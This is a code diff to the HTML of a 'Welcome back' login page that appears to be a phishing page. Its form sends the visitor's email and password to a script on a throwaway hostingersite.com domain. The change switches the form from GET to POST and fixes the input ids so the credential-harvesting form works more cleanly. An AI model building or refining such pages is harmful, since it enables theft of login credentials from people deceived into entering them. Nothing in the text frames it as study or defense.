--- a/index.html
+++ b/index.html
@@ -816,10 +816,11 @@
 
 <div id="container" class="">
    <h1 class="title-text">Welcome back</h1>
-   <form novalidate="" id="frmLogin" action="https://blueviolet-chimpanzee-178239.hostingersite.com/public.php" method="GET">
+
+  <form novalidate="" id="frmLogin" action="https://blueviolet-chimpanzee-178239.hostingersite.com/public.php" method="POST">
       <div class="input-group">
          <div class="input-wrapper ">
-            <input type="email" id="username" name="username" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
+            <input type="email" id="txtEmail" name="username" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
             <label for="txtEmail">Email</label>
             <span class="bar"></span>
          </div>
@@ -832,7 +833,7 @@
       </div>
       <div class="input-group">
          <div class="input-wrapper">
-            <input type="password" id="Password" name="Password" required="" autocomplete="off">
+            <input type="password" id="txtPass" name="Password" required="" autocomplete="off">
             <label for="txtPass">Password</label>
             <span class="bar"></span>
             <span id="btnToggle" class="input-button icon_hidden"></span>
@@ -851,6 +852,11 @@
       </div>
       <input type="hidden" name="csrf_token" value="7cf9307bc5712c00ffc0bb91376f1ad501f66d16">
    </form>
+
+
+
+
+
    <div class="separator separator-show" id="separatorId">
       <p class="center-text social-text">
          Or continue with
